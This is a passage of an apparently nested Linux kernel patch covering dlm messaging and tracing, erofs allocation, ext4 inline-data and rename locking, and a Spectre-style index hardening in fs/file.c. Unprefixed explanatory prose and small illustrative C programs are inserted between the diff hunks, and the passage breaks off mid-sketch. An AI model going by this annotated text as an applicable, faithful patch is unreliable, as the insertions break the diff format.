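Every send_message() caller above now threads the resource name through purely so the commit path can trace it; senders without a resource, such as send_purge(), pass (NULL, 0). A tiny sketch of that convention; trace_send and send_message here are illustrative stand-ins for the dlm functions.

#include <stdio.h>

static void trace_send(const void *name, int namelen)
{
	if (name && namelen > 0)
		printf("send: res=%.*s\n", namelen, (const char *)name);
	else
		printf("send: no resource\n");
}

static int send_message(const void *name, int namelen)
{
	trace_send(name, namelen);	/* commit and trace in one place */
	return 0;
}

int main(void)
{
	send_message("lockres1", 8);
	send_message(NULL, 0);		/* e.g. a purge message */
	return 0;
}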
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index bae050df7abff..7b29ea7bfb416 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -17,7 +17,6 @@
+ #include "recoverd.h"
+ #include "dir.h"
+ #include "midcomms.h"
+-#include "lowcomms.h"
+ #include "config.h"
+ #include "memory.h"
+ #include "lock.h"
+@@ -382,23 +381,23 @@ static int threads_start(void)
+ {
+ 	int error;
+ 
+-	error = dlm_scand_start();
++	/* Thread for sending/receiving messages for all lockspace's */
++	error = dlm_midcomms_start();
+ 	if (error) {
+-		log_print("cannot start dlm_scand thread %d", error);
++		log_print("cannot start dlm midcomms %d", error);
+ 		goto fail;
+ 	}
+ 
+-	/* Thread for sending/receiving messages for all lockspace's */
+-	error = dlm_midcomms_start();
++	error = dlm_scand_start();
+ 	if (error) {
+-		log_print("cannot start dlm lowcomms %d", error);
+-		goto scand_fail;
++		log_print("cannot start dlm_scand thread %d", error);
++		goto midcomms_fail;
+ 	}
+ 
+ 	return 0;
+ 
+- scand_fail:
+-	dlm_scand_stop();
++ midcomms_fail:
++	dlm_midcomms_stop();
+  fail:
+ 	return error;
+ }
+@@ -726,7 +725,7 @@ static int __dlm_new_lockspace(const char *name, const char *cluster,
+ 	if (!ls_count) {
+ 		dlm_scand_stop();
+ 		dlm_midcomms_shutdown();
+-		dlm_lowcomms_stop();
++		dlm_midcomms_stop();
+ 	}
+  out:
+ 	mutex_unlock(&ls_lock);
+@@ -929,7 +928,7 @@ int dlm_release_lockspace(void *lockspace, int force)
+ 	if (!error)
+ 		ls_count--;
+ 	if (!ls_count)
+-		dlm_lowcomms_stop();
++		dlm_midcomms_stop();
+ 	mutex_unlock(&ls_lock);
+ 
+ 	return error;
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 871d4e9f49fb6..6ed09edabea0c 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1982,10 +1982,6 @@ static const struct dlm_proto_ops dlm_sctp_ops = {
+ int dlm_lowcomms_start(void)
+ {
+ 	int error = -EINVAL;
+-	int i;
+-
+-	for (i = 0; i < CONN_HASH_SIZE; i++)
+-		INIT_HLIST_HEAD(&connection_hash[i]);
+ 
+ 	init_local();
+ 	if (!dlm_local_count) {
+@@ -1994,8 +1990,6 @@ int dlm_lowcomms_start(void)
+ 		goto fail;
+ 	}
+ 
+-	INIT_WORK(&listen_con.rwork, process_listen_recv_socket);
+-
+ 	error = work_start();
+ 	if (error)
+ 		goto fail_local;
+@@ -2034,6 +2028,16 @@ fail:
+ 	return error;
+ }
+ 
++void dlm_lowcomms_init(void)
++{
++	int i;
++
++	for (i = 0; i < CONN_HASH_SIZE; i++)
++		INIT_HLIST_HEAD(&connection_hash[i]);
++
++	INIT_WORK(&listen_con.rwork, process_listen_recv_socket);
++}
++
+ void dlm_lowcomms_exit(void)
+ {
+ 	struct dlm_node_addr *na, *safe;
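The lowcomms hunk splits one-time setup (hash tables, the listen work item) out of dlm_lowcomms_start() into a new dlm_lowcomms_init(), so start/stop can cycle per lockspace lifetime without re-initialising state. A compile-and-run sketch of that init/start split, with invented comms_* names.

#include <stdio.h>

static int table_ready;

static void comms_init(void)	/* module load: one-time setup */
{
	table_ready = 1;
	puts("hash tables initialised");
}

static int comms_start(void)	/* first lockspace: may run many times */
{
	if (!table_ready)
		return -1;
	puts("listening started");
	return 0;
}

static void comms_stop(void)
{
	puts("listening stopped");	/* tables stay valid for a restart */
}

int main(void)
{
	comms_init();
	comms_start();
	comms_stop();
	comms_start();	/* safe: the init-time state survived the stop */
	return 0;
}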
+diff --git a/fs/dlm/lowcomms.h b/fs/dlm/lowcomms.h
+index 29369feea9916..bbce7a18416dc 100644
+--- a/fs/dlm/lowcomms.h
++++ b/fs/dlm/lowcomms.h
+@@ -35,6 +35,7 @@ extern int dlm_allow_conn;
+ int dlm_lowcomms_start(void);
+ void dlm_lowcomms_shutdown(void);
+ void dlm_lowcomms_stop(void);
++void dlm_lowcomms_init(void);
+ void dlm_lowcomms_exit(void);
+ int dlm_lowcomms_close(int nodeid);
+ struct dlm_msg *dlm_lowcomms_new_msg(int nodeid, int len, gfp_t allocation,
+diff --git a/fs/dlm/main.c b/fs/dlm/main.c
+index 1c5be4b70ac1b..a77338be32371 100644
+--- a/fs/dlm/main.c
++++ b/fs/dlm/main.c
+@@ -17,7 +17,7 @@
+ #include "user.h"
+ #include "memory.h"
+ #include "config.h"
+-#include "lowcomms.h"
++#include "midcomms.h"
+ 
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/dlm.h>
+@@ -30,6 +30,8 @@ static int __init init_dlm(void)
+ 	if (error)
+ 		goto out;
+ 
++	dlm_midcomms_init();
++
+ 	error = dlm_lockspace_init();
+ 	if (error)
+ 		goto out_mem;
+@@ -66,6 +68,7 @@ static int __init init_dlm(void)
+  out_lockspace:
+ 	dlm_lockspace_exit();
+  out_mem:
++	dlm_midcomms_exit();
+ 	dlm_memory_exit();
+  out:
+ 	return error;
+@@ -79,7 +82,7 @@ static void __exit exit_dlm(void)
+ 	dlm_config_exit();
+ 	dlm_memory_exit();
+ 	dlm_lockspace_exit();
+-	dlm_lowcomms_exit();
++	dlm_midcomms_exit();
+ 	dlm_unregister_debugfs();
+ }
+ 
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index 546c52c46b1c9..b2a25a33a1488 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -132,6 +132,7 @@
+  */
+ #define DLM_DEBUG_FENCE_TERMINATION	0
+ 
++#include <trace/events/dlm.h>
+ #include <net/tcp.h>
+ 
+ #include "dlm_internal.h"
+@@ -194,7 +195,7 @@ struct midcomms_node {
+ };
+ 
+ struct dlm_mhandle {
+-	const struct dlm_header *inner_hd;
++	const union dlm_packet *inner_p;
+ 	struct midcomms_node *node;
+ 	struct dlm_opts *opts;
+ 	struct dlm_msg *msg;
+@@ -405,6 +406,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
++	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 	mh->ack_rcv = ack_rcv;
+ 
+ 	m_header = (struct dlm_header *)ppc;
+@@ -415,8 +417,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	m_header->h_cmd = DLM_FIN;
+ 
+ 	pr_debug("sending fin msg to node %d\n", node->nodeid);
+-	dlm_midcomms_commit_mhandle(mh);
+-	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ 
+ 	return 0;
+ }
+@@ -468,12 +469,26 @@ static void dlm_pas_fin_ack_rcv(struct midcomms_node *node)
+ 		spin_unlock(&node->state_lock);
+ 		log_print("%s: unexpected state: %d\n",
+ 			  __func__, node->state);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		return;
+ 	}
+ 	spin_unlock(&node->state_lock);
+ }
+ 
++static void dlm_receive_buffer_3_2_trace(uint32_t seq, union dlm_packet *p)
++{
++	switch (p->header.h_cmd) {
++	case DLM_MSG:
++		trace_dlm_recv_message(seq, &p->message);
++		break;
++	case DLM_RCOM:
++		trace_dlm_recv_rcom(seq, &p->rcom);
++		break;
++	default:
++		break;
++	}
++}
++
+ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					struct midcomms_node *node,
+ 					uint32_t seq)
+@@ -527,13 +542,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				spin_unlock(&node->state_lock);
+ 				log_print("%s: unexpected state: %d\n",
+ 					  __func__, node->state);
+-				WARN_ON(1);
++				WARN_ON_ONCE(1);
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+ 			break;
+ 		default:
+-			WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++			WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++			dlm_receive_buffer_3_2_trace(seq, p);
+ 			dlm_receive_buffer(p, node->nodeid);
+ 			set_bit(DLM_NODE_ULP_DELIVERED, &node->flags);
+ 			break;
+@@ -748,7 +764,7 @@ static void dlm_midcomms_receive_buffer_3_2(union dlm_packet *p, int nodeid)
+ 			goto out;
+ 		}
+ 
+-		WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++		WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+ 		dlm_receive_buffer(p, nodeid);
+ 		break;
+ 	case DLM_OPTS:
+@@ -1049,7 +1065,7 @@ static struct dlm_msg *dlm_midcomms_get_msg_3_2(struct dlm_mhandle *mh, int node
+ 	dlm_fill_opts_header(opts, len, mh->seq);
+ 
+ 	*ppc += sizeof(*opts);
+-	mh->inner_hd = (const struct dlm_header *)*ppc;
++	mh->inner_p = (const union dlm_packet *)*ppc;
+ 	return msg;
+ }
+ 
+@@ -1073,7 +1089,7 @@ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 	}
+ 
+ 	/* this is a bug, however we keep going and hope it will be resolved */
+-	WARN_ON(test_bit(DLM_NODE_FLAG_STOP_TX, &node->flags));
++	WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_TX, &node->flags));
+ 
+ 	mh = dlm_allocate_mhandle();
+ 	if (!mh)
+@@ -1105,7 +1121,7 @@ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 		break;
+ 	default:
+ 		dlm_free_mhandle(mh);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		goto err;
+ 	}
+ 
+@@ -1124,11 +1140,30 @@ err:
+ }
+ #endif
+ 
+-static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh)
++static void dlm_midcomms_commit_msg_3_2_trace(const struct dlm_mhandle *mh,
++					      const void *name, int namelen)
++{
++	switch (mh->inner_p->header.h_cmd) {
++	case DLM_MSG:
++		trace_dlm_send_message(mh->seq, &mh->inner_p->message,
++				       name, namelen);
++		break;
++	case DLM_RCOM:
++		trace_dlm_send_rcom(mh->seq, &mh->inner_p->rcom);
++		break;
++	default:
++		/* nothing to trace */
++		break;
++	}
++}
++
++static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh,
++					const void *name, int namelen)
+ {
+ 	/* nexthdr chain for fast lookup */
+-	mh->opts->o_nextcmd = mh->inner_hd->h_cmd;
++	mh->opts->o_nextcmd = mh->inner_p->header.h_cmd;
+ 	mh->committed = true;
++	dlm_midcomms_commit_msg_3_2_trace(mh, name, namelen);
+ 	dlm_lowcomms_commit_msg(mh->msg);
+ }
+ 
+@@ -1136,8 +1171,10 @@ static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh)
+  * dlm_midcomms_get_mhandle
+  */
+ #ifndef __CHECKER__
+-void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh)
++void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh,
++				 const void *name, int namelen)
+ {
++
+ 	switch (mh->node->version) {
+ 	case DLM_VERSION_3_1:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+@@ -1148,25 +1185,47 @@ void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh)
+ 		dlm_free_mhandle(mh);
+ 		break;
+ 	case DLM_VERSION_3_2:
+-		dlm_midcomms_commit_msg_3_2(mh);
++		/* hold the rcu read lock here, because while we are
++		 * sending the dlm message out we could receive an ack
++		 * back which releases the mhandle, and we would get a
++		 * use after free.
++		 */
++		rcu_read_lock();
++		dlm_midcomms_commit_msg_3_2(mh, name, namelen);
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
++		rcu_read_unlock();
+ 		break;
+ 	default:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		break;
+ 	}
+ }
+ #endif
+ 
+ int dlm_midcomms_start(void)
++{
++	return dlm_lowcomms_start();
++}
++
++void dlm_midcomms_stop(void)
++{
++	dlm_lowcomms_stop();
++}
++
++void dlm_midcomms_init(void)
+ {
+ 	int i;
+ 
+ 	for (i = 0; i < CONN_HASH_SIZE; i++)
+ 		INIT_HLIST_HEAD(&node_hash[i]);
+ 
+-	return dlm_lowcomms_start();
++	dlm_lowcomms_init();
++}
++
++void dlm_midcomms_exit(void)
++{
++	dlm_lowcomms_exit();
+ }
+ 
+ static void dlm_act_fin_ack_rcv(struct midcomms_node *node)
+@@ -1195,7 +1254,7 @@ static void dlm_act_fin_ack_rcv(struct midcomms_node *node)
+ 		spin_unlock(&node->state_lock);
+ 		log_print("%s: unexpected state: %d\n",
+ 			  __func__, node->state);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		return;
+ 	}
+ 	spin_unlock(&node->state_lock);
+@@ -1307,7 +1366,8 @@ static void midcomms_node_release(struct rcu_head *rcu)
+ {
+ 	struct midcomms_node *node = container_of(rcu, struct midcomms_node, rcu);
+ 
+-	WARN_ON(atomic_read(&node->send_queue_cnt));
++	WARN_ON_ONCE(atomic_read(&node->send_queue_cnt));
++	dlm_send_queue_flush(node);
+ 	kfree(node);
+ }
+ 
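The commit path for protocol 3.2 now runs under rcu_read_lock() because, once the message is on the wire, the peer's ack can free the mhandle. A userspace analogue of that lifetime rule, using a pthread read-write lock as a stand-in for RCU; all names are invented.

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

static pthread_rwlock_t guard = PTHREAD_RWLOCK_INITIALIZER;

struct mhandle { int seq; };

static void commit(struct mhandle *mh)
{
	pthread_rwlock_rdlock(&guard);		/* ack-side free must wait */
	printf("committing seq %d\n", mh->seq);	/* mh is still valid here */
	pthread_rwlock_unlock(&guard);
}

static void ack_free(struct mhandle *mh)
{
	pthread_rwlock_wrlock(&guard);	/* waits for any in-flight commit */
	free(mh);
	pthread_rwlock_unlock(&guard);
}

int main(void)
{
	struct mhandle *mh = malloc(sizeof(*mh));

	mh->seq = 42;
	commit(mh);
	ack_free(mh);
	return 0;
}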
+diff --git a/fs/dlm/midcomms.h b/fs/dlm/midcomms.h
+index 82bcd96619228..69296552d5add 100644
+--- a/fs/dlm/midcomms.h
++++ b/fs/dlm/midcomms.h
+@@ -17,9 +17,13 @@ struct midcomms_node;
+ int dlm_process_incoming_buffer(int nodeid, unsigned char *buf, int buflen);
+ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 					     gfp_t allocation, char **ppc);
+-void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh);
++void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh, const void *name,
++				 int namelen);
+ int dlm_midcomms_close(int nodeid);
+ int dlm_midcomms_start(void);
++void dlm_midcomms_stop(void);
++void dlm_midcomms_init(void);
++void dlm_midcomms_exit(void);
+ void dlm_midcomms_shutdown(void);
+ void dlm_midcomms_add_member(int nodeid);
+ void dlm_midcomms_remove_member(int nodeid);
+diff --git a/fs/dlm/rcom.c b/fs/dlm/rcom.c
+index f19860315043a..b76d52e2f6bdd 100644
+--- a/fs/dlm/rcom.c
++++ b/fs/dlm/rcom.c
+@@ -91,7 +91,7 @@ static int create_rcom_stateless(struct dlm_ls *ls, int to_nodeid, int type,
+ 
+ static void send_rcom(struct dlm_mhandle *mh, struct dlm_rcom *rc)
+ {
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ }
+ 
+ static void send_rcom_stateless(struct dlm_msg *msg, struct dlm_rcom *rc)
+@@ -516,7 +516,7 @@ int dlm_send_ls_not_ready(int nodeid, struct dlm_rcom *rc_in)
+ 	rf = (struct rcom_config *) rc->rc_buf;
+ 	rf->rf_lvblen = cpu_to_le32(~0U);
+ 
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ 
+ 	return 0;
+ }
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 091fd5adf818f..5cd612a8f8584 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -278,7 +278,7 @@ again:
+ 		}
+ 	}
+ 	if (no < nrpages_out && strm->buf.out)
+-		kunmap(rq->in[no]);
++		kunmap(rq->out[no]);
+ 	if (ni < nrpages_in)
+ 		kunmap(rq->in[ni]);
+ 	/* 4. push back LZMA stream context to the global list */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index ee7c88c9b5afa..cf4871834ebb2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1047,12 +1047,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kcalloc(be->nr_pages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(be->nr_pages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kcalloc(pclusterpages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(pclusterpages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1100,7 +1100,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kfree(be->compressed_pages);
++		kvfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1119,7 +1119,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kfree(be->decompressed_pages);
++		kvfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
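The erofs hunk moves the per-pcluster page arrays from kcalloc() to kvcalloc(), so large clusters can fall back to vmalloc, and the matching frees switch to kvfree(). A trivial userspace sketch of the pairing rule, with calloc/free standing in for the kernel allocators.

#include <stdio.h>
#include <stdlib.h>

static void *kvcalloc(size_t n, size_t size)
{
	return calloc(n, size);	/* stands in for kmalloc-then-vmalloc fallback */
}

static void kvfree(void *p)
{
	free(p);	/* must pair with kvcalloc, never a plain kfree */
}

int main(void)
{
	void **pages = kvcalloc(1 << 14, sizeof(void *));

	if (!pages)
		return 1;
	puts("large page array allocated");
	kvfree(pages);
	return 0;
}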
+diff --git a/fs/ext4/fsmap.c b/fs/ext4/fsmap.c
+index 4493ef0c715e9..cdf9bfe10137f 100644
+--- a/fs/ext4/fsmap.c
++++ b/fs/ext4/fsmap.c
+@@ -486,6 +486,8 @@ static int ext4_getfsmap_datadev(struct super_block *sb,
+ 		keys[0].fmr_physical = bofs;
+ 	if (keys[1].fmr_physical >= eofs)
+ 		keys[1].fmr_physical = eofs - 1;
++	if (keys[1].fmr_physical < keys[0].fmr_physical)
++		return 0;
+ 	start_fsb = keys[0].fmr_physical;
+ 	end_fsb = keys[1].fmr_physical;
+ 
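After clamping both query keys to the device, the new ext4 check returns an empty result when the clamped range is inverted, rather than scanning with end below start. A small sketch of the clamp-then-check order; query() and its arguments are illustrative.

#include <stdio.h>

static int query(unsigned long long lo, unsigned long long hi,
		 unsigned long long dev_start, unsigned long long dev_end)
{
	if (lo < dev_start)
		lo = dev_start;
	if (hi >= dev_end)
		hi = dev_end - 1;
	if (hi < lo)		/* the whole query lies outside the device */
		return 0;
	printf("scan [%llu, %llu]\n", lo, hi);
	return 1;
}

int main(void)
{
	query(10, 20, 0, 100);		/* normal case */
	query(200, 300, 0, 100);	/* clamps to [200, 99]: skipped */
	return 0;
}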
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index a4fbe825694b1..c4475a74c7626 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -159,7 +159,6 @@ int ext4_find_inline_data_nolock(struct inode *inode)
+ 					(void *)ext4_raw_inode(&is.iloc));
+ 		EXT4_I(inode)->i_inline_size = EXT4_MIN_INLINE_DATA_SIZE +
+ 				le32_to_cpu(is.s.here->e_value_size);
+-		ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
+ 	}
+ out:
+ 	brelse(is.iloc.bh);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 283afda26d9cb..34c87fcfd0617 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4727,8 +4727,13 @@ static inline int ext4_iget_extra_inode(struct inode *inode,
+ 
+ 	if (EXT4_INODE_HAS_XATTR_SPACE(inode)  &&
+ 	    *magic == cpu_to_le32(EXT4_XATTR_MAGIC)) {
++		int err;
++
+ 		ext4_set_inode_state(inode, EXT4_STATE_XATTR);
+-		return ext4_find_inline_data_nolock(inode);
++		err = ext4_find_inline_data_nolock(inode);
++		if (!err && ext4_has_inline_data(inode))
++			ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
++		return err;
+ 	} else
+ 		EXT4_I(inode)->i_inline_off = 0;
+ 	return 0;
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8067ccda34e45..8c2b1ff5e6959 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -434,6 +434,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 		ei_bl->i_flags = 0;
+ 		inode_set_iversion(inode_bl, 1);
+ 		i_size_write(inode_bl, 0);
++		EXT4_I(inode_bl)->i_disksize = inode_bl->i_size;
+ 		inode_bl->i_mode = S_IFREG;
+ 		if (ext4_has_feature_extents(sb)) {
+ 			ext4_set_inode_flag(inode_bl, EXT4_INODE_EXTENTS);
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 1c5518a4bdf91..800d631c920b4 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -1595,11 +1595,10 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
+ 		int has_inline_data = 1;
+ 		ret = ext4_find_inline_entry(dir, fname, res_dir,
+ 					     &has_inline_data);
+-		if (has_inline_data) {
+-			if (inlined)
+-				*inlined = 1;
++		if (inlined)
++			*inlined = has_inline_data;
++		if (has_inline_data)
+ 			goto cleanup_and_exit;
+-		}
+ 	}
+ 
+ 	if ((namelen <= 2) && (name[0] == '.') &&
+@@ -3646,7 +3645,8 @@ static void ext4_resetent(handle_t *handle, struct ext4_renament *ent,
+ 	 * so the old->de may no longer valid and need to find it again
+ 	 * before reset old inode info.
+ 	 */
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
+ 	if (IS_ERR(old.bh))
+ 		retval = PTR_ERR(old.bh);
+ 	if (!old.bh)
+@@ -3813,9 +3813,20 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
+-	if (IS_ERR(old.bh))
+-		return PTR_ERR(old.bh);
++	/*
++	 * We need to protect against the old.inode directory getting converted
++	 * from inline directory format into a normal one.
++	 */
++	if (S_ISDIR(old.inode->i_mode))
++		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
++
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
++	if (IS_ERR(old.bh)) {
++		retval = PTR_ERR(old.bh);
++		goto unlock_moved_dir;
++	}
++
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+ 	 *  We might rmdir the source, keep it as pwd of some process
+@@ -3873,8 +3884,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval)
++		if (retval) {
++			inode_unlock(old.inode);
+ 			goto end_rename;
++		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+@@ -4010,6 +4023,11 @@ release_bh:
+ 	brelse(old.dir_bh);
+ 	brelse(old.bh);
+ 	brelse(new.bh);
++
++unlock_moved_dir:
++	if (S_ISDIR(old.inode->i_mode))
++		inode_unlock(old.inode);
++
+ 	return retval;
+ }
+ 
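The rename hunks take old.inode's lock before the directory-entry lookup and route every failure, early or late, through a label that drops it. A minimal sketch of that unlock discipline, using a pthread mutex as a stand-in for inode_lock_nested(); rename_dir is invented.

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t dir_lock = PTHREAD_MUTEX_INITIALIZER;

static int rename_dir(int fail_early)
{
	int ret = 0;

	pthread_mutex_lock(&dir_lock);	/* guards against concurrent conversion */

	if (fail_early) {
		ret = -1;
		goto unlock;		/* error path still releases the lock */
	}
	puts("rename done");
unlock:
	pthread_mutex_unlock(&dir_lock);
	return ret;
}

int main(void)
{
	rename_dir(1);
	rename_dir(0);	/* no deadlock: the first call unlocked on error */
	return 0;
}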
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index 97fa7b4c645fd..d0302b66c215d 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -409,7 +409,8 @@ static void io_submit_init_bio(struct ext4_io_submit *io,
+ 
+ static void io_submit_add_bh(struct ext4_io_submit *io,
+ 			     struct inode *inode,
+-			     struct page *page,
++			     struct page *pagecache_page,
++			     struct page *bounce_page,
+ 			     struct buffer_head *bh)
+ {
+ 	int ret;
+@@ -421,10 +422,11 @@ submit_and_retry:
+ 	}
+ 	if (io->io_bio == NULL)
+ 		io_submit_init_bio(io, bh);
+-	ret = bio_add_page(io->io_bio, page, bh->b_size, bh_offset(bh));
++	ret = bio_add_page(io->io_bio, bounce_page ?: pagecache_page,
++			   bh->b_size, bh_offset(bh));
+ 	if (ret != bh->b_size)
+ 		goto submit_and_retry;
+-	wbc_account_cgroup_owner(io->io_wbc, page, bh->b_size);
++	wbc_account_cgroup_owner(io->io_wbc, pagecache_page, bh->b_size);
+ 	io->io_next_block++;
+ }
+ 
+@@ -543,8 +545,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 	do {
+ 		if (!buffer_async_write(bh))
+ 			continue;
+-		io_submit_add_bh(io, inode,
+-				 bounce_page ? bounce_page : page, bh);
++		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 		nr_submitted++;
+ 		clear_buffer_dirty(bh);
+ 	} while ((bh = bh->b_this_page) != head);
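io_submit_add_bh() now receives both pages, so the bio can carry the encrypted bounce page while cgroup writeback accounting is still charged to the original pagecache page. A tiny sketch of that two-role split; struct page and submit() here are invented stand-ins.

#include <stdio.h>

struct page { const char *owner; };

static void submit(const struct page *data_src, const struct page *account_to)
{
	printf("write from %s, charged to %s\n",
	       data_src->owner, account_to->owner);
}

int main(void)
{
	struct page cache  = { .owner = "user-cgroup" };
	struct page bounce = { .owner = "kernel-bounce" };

	/* bounce path: data from the bounce page, accounting from the
	 * pagecache page - exactly the pair the fixed helper receives */
	submit(&bounce, &cache);
	/* plain path: both roles are the pagecache page */
	submit(&cache, &cache);
	return 0;
}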
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 099a87ec9b2ab..e0eb6eb02a834 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2790,6 +2790,9 @@ shift:
+ 			(void *)header, total_ino);
+ 	EXT4_I(inode)->i_extra_isize = new_extra_isize;
+ 
++	if (ext4_has_inline_data(inode))
++		error = ext4_find_inline_data_nolock(inode);
++
+ cleanup:
+ 	if (error && (mnt_count != le16_to_cpu(sbi->s_es->s_mnt_count))) {
+ 		ext4_warning(inode->i_sb, "Unable to expand inode %lu. Delete some EAs or run e2fsck.",
+diff --git a/fs/file.c b/fs/file.c
+index c942c89ca4cda..7893ea161d770 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -642,6 +642,7 @@ static struct file *pick_file(struct files_struct *files, unsigned fd)
+ 	if (fd >= fdt->max_fds)
+ 		return NULL;
+ 
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	file = fdt->fd[fd];
+ 	if (file) {
+ 		rcu_assign_pointer(fdt->fd[fd], NULL);
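pick_file() adds array_index_nospec() after the architectural bounds check so a mispredicted branch cannot speculatively read fdt->fd[] out of bounds. A portable sketch assuming the real helper's contract (an in-range index is returned unchanged, an out-of-range one collapses to 0); the mask trick below is an approximation, not the kernel's implementation.

#include <stddef.h>
#include <stdio.h>

static size_t index_nospec(size_t idx, size_t size)
{
	size_t mask = -(size_t)(idx < size);	/* all-ones iff idx is in range */

	return idx & mask;			/* out-of-range collapses to 0 */
}

int main(void)
{
	int fd_table[8] = { 0 };
	size_t fd = 5;

	if (fd < 8) {				/* architectural bounds check */
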